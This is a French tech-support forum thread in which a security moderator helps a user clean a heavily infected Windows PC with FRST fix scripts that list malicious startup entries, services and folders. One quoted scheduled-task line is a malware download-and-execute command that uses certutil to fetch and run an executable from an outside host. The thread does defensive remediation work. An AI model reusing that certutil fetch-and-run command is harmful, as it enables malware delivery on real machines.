J'ai un virus

Résolu
Kothaik Messages postés 67 Date d'inscription   Statut Membre Dernière intervention   -  
bazfile Messages postés 58603 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   -
Bonjour , suite à un téléchargement que je n'aurais surement jamais du faire , 2 logiciel se sont installés sur mon pc et ouvrent constamment des nouvelles fenêtre sur mon navigateur. Comme vous pouvez voir sur la première photo même après démarrage et désinstallation ils réapparaissent . J'ai essayer de réinitialiser mon pc mais une erreur se produit lors de la réinitialisation . Que faire? Mon pc est pour l'instant inutilisable plus de 20secondes de suite .
A voir également:

3 réponses

Réponse 1 / 3
Kothaik Messages postés 67 Date d'inscription   Statut Membre Dernière intervention   5
 
Merci pour votre aide , voici mes liens
Addition : https://pjjoint.malekal.com/files.php?id=20200621_u5s15b10w12w12
Shortcut : https://pjjoint.malekal.com/files.php?id=20200621_f10e7v15u8t6
Frst : https://pjjoint.malekal.com/files.php?id=FRST_20200621_g11s5i8g5g6
1
bazfile Messages postés 58603 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 799
 
Inutile de poster à répétition je ne suis pas chez moi je te reprends vers 19h, pour info ton pc est très infecté.
0
Kothaik Messages postés 67 Date d'inscription   Statut Membre Dernière intervention   5 > bazfile Messages postés 58603 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention  
 
Merci beaucoup je te dis à tout à l’heure
0
bazfile Messages postés 58603 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 799 > Kothaik Messages postés 67 Date d'inscription   Statut Membre Dernière intervention  
 

Une fois ton pc désinfecté il faudra changer tous tes mots de passe en ligne, ils ont pu être dérobés et utilisés à ton insu.

Procédure à faire dans l'ordre indiqué :
ATTENTION pour que la désinfection fonctionne il faut démarrer ton pc en mode sans échec avec "prise en charge du réseau".

Pour le démarrage en mode sans échec il suffit de lire attentivement cette page et faire ce qui est indiqué au paragraphe Démarrer en mode sans échec depuis Windows.
Tu peux imprimer les pages ou prendre des notes car à partir du paragraphe Les options de récupération tu ne seras plus sous Windows tu n'y reviendras qu'une fois en mode sans échec.

Une fois Windows démarré en mode sans échec avec prise en charge du réseau

1- Ouvre FRST
2- Copie l'intégralité du script qui est dans l'encadré qui suit : 
Start::
CloseProcesses:
HKLM-x32\...\Run: [kissq] => C:\Users\amdkl\AppData\Local\Temp\kissq.exe************ [4114944 2020-06-21] () [Fichier non signé]
HKLM\...\RunOnce: [5qzi2sg0z2h] => C:\Program Files (x86)\Ncif\750876728.exe [462336 2020-06-21] () [Fichier non signé]
HKLM\...\RunOnce: [system recover] => C:\Program Files (x86)\Audacity\Sylecowixo.exe [352768 2020-06-21] () [Fichier non signé]
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [Chromium] => "c:\users\amdkl\appdata\local\chromium\application\chrome.exe" --auto-launch-at-startup --profile-directory="Default" --restore-last-session
C:\Users\amdkl\AppData\Local\Chromium
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [697489] => C:\Users\amdkl\AppData\Roaming\yz0wgn0pqvh\u3xb3qzclgn.exe [703873 2020-06-21] ( () [Fichier non signé])  [Fichier en cours d'utilisation ]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [61I18BXXTK0Q87F] => C:\Program Files\KBCWSV4VA5\KBCWSV4VA.exe [2612224 2020-06-21] (P88XH2) [Fichier non signé]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [CrimsonDew] => C:\WINDOWS\rss\csrss.exe [3990528 2020-06-21] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [3764881] => C:\Users\amdkl\AppData\Roaming\ycnqdicvdz3\pqmoyittgmc.exe [703873 2020-06-21] ( () [Fichier non signé])  [Fichier en cours d'utilisation ]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [ERNI5ZOPGHGZZG9] => C:\Program Files\UUBH81IXU4\UUBH81IXU.exe [2612224 2020-06-21] (P88XH2) [Fichier non signé]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [CloudNet] => C:\Users\amdkl\AppData\Roaming\d590f02aca72\d590f02aca72.exe [549376 2020-06-21] () [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [1723593] => C:\Users\amdkl\AppData\Roaming\v3i2pchd5jf\dygbsvynr4l.exe [703873 2020-06-21] ( () [Fichier non signé])  [Fichier en cours d'utilisation ]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [W55SY39R1LSQS9K] => C:\Program Files\OIUA1ZEAF3\OIUA1ZEAF.exe [2612224 2020-06-21] (P88XH2) [Fichier non signé]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [5783465] => C:\Users\amdkl\AppData\Roaming\kesnhchnucn\ilg54qi5uct.exe [703873 2020-06-21] ( () [Fichier non signé])  [Fichier en cours d'utilisation ]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [S3NJ2QEH7MQ7X3D] => C:\Program Files\TT2LK4ITAE\TT2LK4ITA.exe [2612224 2020-06-21] (P88XH2) [Fichier non signé]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [476727] => C:\Users\amdkl\AppData\Roaming\xfmmbpdmgf5\k3mseoaccob.exe [703873 2020-06-21] ( () [Fichier non signé])  [Fichier en cours d'utilisation ]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [RV4KA6LACC17EI1] => C:\Program Files\J61KHWD2BY\WV8ZPVJ3A.exe [2612224 2020-06-21] (P88XH2) [Fichier non signé]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [8319048] => C:\Users\amdkl\AppData\Roaming\diojashwvmw\jfgswasxrns.exe [703873 2020-06-21] ( () [Fichier non signé])  [Fichier en cours d'utilisation ]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [7MKXJ2JDEKKIRPK] => C:\Program Files\IEJKQTI3XI\26ELYVKOQ.exe [2612224 2020-06-21] (P88XH2) [Fichier non signé]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\RunOnce: [completeuninstall] => C:\Program Files (x86)\gairvg\661f7562-d95a-47d4-866d-09e98860b559.exe [3072 2020-06-21] () [Fichier non signé]
AppInit_DLLs: C:\ProgramData\Voyasollam\OzerHotla.dll => C:\ProgramData\Voyasollam\OzerHotla.dll [342528 2020-06-21] () [Fichier non signé]
AppInit_DLLs-x32: C:\ProgramData\Voyasollam\Blackcannix.dll => C:\ProgramData\Voyasollam\Blackcannix.dll [460800 2020-06-21] () [Fichier non signé]
Startup: C:\Users\amdkl\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk [2020-06-21]
ShortcutTarget: SmartClock.lnk -> C:\Users\amdkl\AppData\Roaming\Smart Clock\SmartClock.exe (International GeoGebra Institute) [Fichier non signé]
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction 
CHR HKLM\SOFTWARE\Policies\Google: Restriction
Task: {36C64EE9-B411-4D52-8F6F-D079C7D5D6DD} - System32\Tasks\Smart Clock => C:\Users\amdkl\AppData\Roaming\Smart Clock\SmartClock.exe [3774976 2020-06-21] (International GeoGebra Institute) [Fichier non signé]
Task: {985CB84D-973B-42A5-840F-84F0A7AFCE6B} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://gfixprice.space/app/app.exe C:\Users\amdkl\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\amdkl\AppData\Local\Temp\csrss\scheduled.exe /31340
Task: {A8EDABB6-F534-4116-9CE5-7F009211DF31} - System32\Tasks\CMPCUAC => C:\Program Files\CleanMyPC\CleanMyPC.exe
Task: {F5676CEA-C220-40DB-8F60-754ACB4CEE8C} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [3990528 2020-06-21] () [Fichier non signé]
R2 BF6A7813; C:\ProgramData\BF6A7813\FAA65007.dll [4011520 2020-06-21] () [Fichier non signé]
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [2285664 2017-02-22] (GOLD CLICK LIMITED -> Gold Click Ltd)
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2020-06-20] () [Fichier non signé]
R2 Voyasollam; C:\ProgramData\\Voyasollam\\Voyasollam.exe [4505088 2020-06-21] () [Fichier non signé]
R2 WinDefender; C:\WINDOWS\windefender.exe [1986560 2020-06-21] () [Fichier non signé]
C:\Program Files (x86)\ProxyGate
C:\Program Files (x86)\gairvg
C:\Users\amdkl\AppData\Local\Cofla.exe
C:\Users\amdkl\AppData\Local\Cofla.tst
C:\Users\amdkl\AppData\Roaming\yz0wgn0pqvh
C:\Program Files\KBCWSV4VA5
C:\Program Files (x86)\Ncif
C:\Users\amdkl\AppData\Roaming\Smart Clock
C:\Users\amdkl\AppData\Roaming\d590f02aca72\d590f02aca72.exe
C:\Windows\rss\csrss.exe
C:\Windows\windefender.exe
C:\Users\amdkl\AppData\Roaming\diojashwvmw
C:\Users\amdkl\AppData\Roaming\kesnhchnucn
C:\Users\amdkl\AppData\Roaming\v3i2pchd5jf
C:\Users\amdkl\AppData\Roaming\xfmmbpdmgf5
C:\Users\amdkl\AppData\Roaming\ycnqdicvdz3
C:\Users\amdkl\AppData\Roaming\yz0wgn0pqvh
C:\Program Files\IEJKQTI3XI
C:\Program Files\J61KHWD2BY
C:\Program Files\KBCWSV4VA5
C:\Program Files\OIUA1ZEAF3
C:\Program Files\TT2LK4ITAE
C:\Program Files\UUBH81IXU4
C:\ProgramData\Voyasollam
C:\ProgramData\Voyasollams
C:\Program Files\CleanMyPC
Hosts:
RemoveProxy:
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Réinitialise Google Chrome et Firefox https://forums.commentcamarche.net/forum/affich-37585758-reinitialiser-son-navigateur
6- VÉRIFIE ET DIT-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT.

7- Fait une nouvelle analyse FRST et donne les liens des rapports dans ta réponse.

0
Kothaik Messages postés 67 Date d'inscription   Statut Membre Dernière intervention   5 > bazfile Messages postés 58603 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention  
 
Merci , j'ai suivi vos étapes , et voici le contenu du fichier Fixlog:
https://pjjoint.malekal.com/files.php?id=20200621_k9t7h5o6o13

Le problème quand à lui est toujours présent :/

voici mon nouveau scan FRST :

Additon : https://pjjoint.malekal.com/files.php?id=20200621_y6d15s7e11o13

FRST: https://pjjoint.malekal.com/files.php?id=FRST_20200621_l14m13y7v6t12

Shortcut: https://pjjoint.malekal.com/files.php?id=20200621_f14b5x9p11d8

Quand aux logiciels , ceux ci sont toujours la , je parle des 4 premiers( sauf discord )



Je tiens encore une fois à vous remercier pour votre aide et m'excuser pour les messages ou réponses envoyer en double mais suite au bug de mon pc je pensais que les messages ne s'étaient pas envoyés.
0
bazfile Messages postés 58603 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 799 > Kothaik Messages postés 67 Date d'inscription   Statut Membre Dernière intervention  
 
Tu dis que les 4 premiers sur la photo sauf Discord posent problème je pense que tu voulais dire les 3 premiers car le quatrième c'est Vegas pro 17 que tu as installé sur ton pc et c'est certainement lui qui t'a infecté car c'était une version piratée de Vegas, donc si tu n'en veux plus désinstalle-le avec RevoUninstaller en mode Scan Avancé voir CETTE PAGE.

C'est tout de même mieux mais vu que tu n'as pas fait ce que je t'avais demandé c'est normal que la désinfection ne soit pas totale, je t'avais bien dit de faire la correction FRST en mode sans échec et tu l'as faite en mode normal, fait ce qui est indiqué sinon on y arrivera pas.

Recommence la correction FRST avec le nouveau script ci-dessous, mais attention fait-le comme expliqué précédemment c'est à dire en mode sans échec


Start::
CloseProcesses
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [439320] => C:\Users\amdkl\AppData\Roaming\nd3rn3s4pmd\y2sxv2dmmmz.exe [703873 2020-06-21] ( () [Fichier non signé])  [Fichier en cours d'utilisation ]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [UQ6BG2296B0V8IQ] => C:\Program Files\9CXWFSO050\9CXWFSO05.exe [2612224 2020-06-21] (P88XH2) [Fichier non signé]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [8430533] => C:\Users\amdkl\AppData\Roaming\lnu3jsswko0\ck1gcojbplw.exe [610957 2020-06-21] ( () [Fichier non signé])  [Fichier en cours d'utilisation ]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [JZMLIQ3GODBLKXO] => C:\Program Files\C5VDTBXDCR\UXXN9NTMN.exe [2612224 2020-06-21] (3@W805P@Q) [Fichier non signé]
HKU\S-1-5-21-872949447-3490513148-4289759274-1001\...\Run: [gairvg] => rundll32.exe "C:\Program Files (x86)\gairvg\gairvg.dll",gairvg
C:\Program Files (x86)\gairvg
Task: {F9F0496B-942C-43B9-8C4E-CF7505AE892A} - System32\Tasks\psv_Alphahome => cmd.exe /c regedit.exe /s "C:\ProgramData\AppmallosayoV\Hayex.reg" & del "C:\ProgramData\AppmallosayoV\Hayex.reg" & SCHTASKS /Delete /TN "psv_Alphahome" /F 
R2 CloudPrinter; C:\ProgramData\\CloudPrinter\\CloudPrinter.exe [4505088 2020-06-21] () [Fichier non signé]
R2 AppmallosayoV; C:\ProgramData\\AppmallosayoV\\AppmallosayoV.exe [4785152 2020-06-20] () [Fichier non signé]
S2 WinDefender; C:\WINDOWS\windefender.exe [X]
2020-06-21 12:51 - 2020-06-21 20:49 - 000000000 ____D C:\Users\amdkl\AppData\Roaming\d590f02aca72
2020-06-21 12:24 - 2020-06-21 21:06 - 000015607 _____ C:\WINDOWS\SysWOW64\findit.xml
2020-06-21 12:24 - 2020-06-21 12:24 - 003774976 _____ (International GeoGebra Institute) C:\Users\amdkl\AppData\Roaming\rthgf.exe
2020-06-21 12:24 - 2020-06-21 12:24 - 000000000 ____D C:\Users\amdkl\AppData\Roaming\Mozilla
2020-06-21 12:24 - 2020-06-21 12:24 - 000000000 ____D C:\Users\amdkl\AppData\Local\app
2020-06-21 12:24 - 2020-06-21 12:24 - 000000000 ____D C:\ProgramData\wxobgbai
2020-06-21 12:24 - 2020-06-21 12:24 - 000000000 ____D C:\ProgramData\Riate
2020-06-21 12:23 - 2020-06-21 21:06 - 000000000 ____D C:\ProgramData\CloudPrinter
2020-06-21 12:23 - 2020-06-21 20:49 - 000000000 ___HD C:\WINDOWS\rss
2020-06-21 12:23 - 2020-06-21 20:46 - 000000000 __RHD C:\ProgramData\BF6A7813
2020-06-21 12:23 - 2020-06-21 12:25 - 000000000 ____D C:\ProgramData\Logic Cramble
2020-06-21 12:23 - 2020-06-21 12:24 - 000000000 ____D C:\ProgramData\yth
2020-06-21 12:23 - 2020-06-21 12:23 - 008630272 _____ C:\Users\amdkl\AppData\Local\agent.dat
2020-06-21 12:23 - 2020-06-21 12:23 - 003774976 _____ (International GeoGebra Institute) C:\Users\amdkl\AppData\Roaming\erfddd.exe
2020-06-21 12:23 - 2020-06-21 12:23 - 003384320 _____ (IObit ) C:\Users\amdkl\AppData\Roaming\tyhg.exe
2020-06-21 12:23 - 2020-06-21 12:23 - 002747392 _____ C:\Users\amdkl\AppData\Roaming\dfgdfg.exe
2020-06-21 12:23 - 2020-06-21 12:23 - 002188510 _____ C:\Users\amdkl\AppData\Local\Sildom.tst
2020-06-21 12:23 - 2020-06-21 12:23 - 001895382 _____ C:\Users\amdkl\AppData\Local\Flexex.bin
2020-06-21 12:23 - 2020-06-21 12:23 - 000126464 _____ C:\Users\amdkl\AppData\Local\noah.dat
2020-06-21 12:23 - 2020-06-21 12:23 - 000072576 _____ C:\Users\amdkl\AppData\Local\Config.xml
2020-06-21 12:23 - 2020-06-21 12:23 - 000025368 _____ (FsFilter Network) C:\WINDOWS\D590F02ACA72.sys
2020-06-21 12:23 - 2020-06-21 12:23 - 000018432 _____ C:\Users\amdkl\AppData\Local\Main.dat
2020-06-21 12:23 - 2020-06-21 12:23 - 000000000 ____D C:\Users\amdkl\AppData\Roaming\indefendesstv
2020-06-21 12:23 - 2020-06-21 12:23 - 000000000 ____D C:\ProgramData\Vitmo
2020-06-21 12:23 - 2020-06-21 12:23 - 000000000 ____D C:\ProgramData\Urebe
2020-06-21 12:23 - 2020-06-21 12:23 - 000000000 ____D C:\ProgramData\sde
2020-06-21 12:23 - 2020-06-21 12:23 - 000000000 ____D C:\ProgramData\pClVrOrBk
2020-06-21 12:23 - 2020-06-21 12:23 - 000000000 ____D C:\ProgramData\1pNjTVYZif1w
2020-06-21 12:23 - 2020-06-21 12:22 - 004505088 _____ C:\Users\amdkl\AppData\Local\Sildom.exe
C:\ProgramData\AppmallosayoVs
C:\ProgramData\AppmallosayoV
C:\Users\amdkl\AppData\Roaming\lnu3jsswko0
C:\Program Files\C5VDTBXDCR
C:\Program Files\9CXWFSO050
C:\ProgramData\BF6A7813
C:\Users\amdkl\AppData\Roaming\lnu3jsswko0\ck1gcojbplw.exe
C:\Users\amdkl\AppData\Roaming\nd3rn3s4pmd\y2sxv2dmmmz.exe
C:\ProgramData\CloudPrinter\CloudPrinter.exe
C:\Users\amdkl\AppData\Local\Temp\is-IUQ23.tmp\ck1gcojbplw.tmp
C:\Users\amdkl\AppData\Local\Temp\is-J0PPM.tmp\y2sxv2dmmmz.tmp
C:\Program Files\C5VDTBXDCR\UXXN9NTMN.exe
RemoveProxy:
EmptyTemp:
End:

Fait une nouvelle analyse FRST et donne les liens des rapports dans ta réponse.

0
Réponse 2 / 3
bazfile Messages postés 58603 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 799
 
Bonjour, 
Comme vous pouvez voir sur la première photo

Elle est où cette photo ??? Voir cette page https://www.commentcamarche.net/infos/25913-ccm-inserer-une-image-dans-une-discussion/

Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis ouvre-le tu auras ceci :

Puis coche la case shortcut comme ceci :

Clique sur Analyser à la fin de l'analyse tu auras trois fichiers texte sur le bureau FRST, Addition et Shortcut , attention de bien attendre que les messages disant que l'analyse est terminée s'affichent, ensuite envoie ces rapports sur https://pjjoint.malekal.com/ voir ce tutoriel paragraphe Envoyer les rapports d’analyse sur pjjoint puis donne les trois liens générés par Pjoint dans ton prochain message.
0
Réponse 3 / 3
Utilisateur anonyme
 
Bonjour, ne pas installer la mise à jour 2004, elle est instable donc faut pas faire la mise à jour pour l’instant et de toute façon pour l’instant la version 1903 a encore des mise à jour
-1
bazfile Messages postés 58603 Date d'inscription   Statut Modérateur, Contributeur sécurité Dernière intervention   19 799
 
Elle ne pose aucun problème sur mon pc, ce n'est pas parce que Microsoft te dit que ton pc n'est pas compatible voir cette page que c'est le cas pour tous les pc.
0

Discussions similaires

Softonic,est-ce un virus ?
techmel1 -
techmel1 -

6 réponses
message de postmaster incessant !
wasap -
wasap -

9 réponses
Désinstaller Softonic
Diguimette -
lilidurhone -

5 réponses
Message Apple virus !!
Souclik67 -
MPMP10 -

3 réponses
4 virus en raison d’un porno ????
valou -
Bello040420 -

9 réponses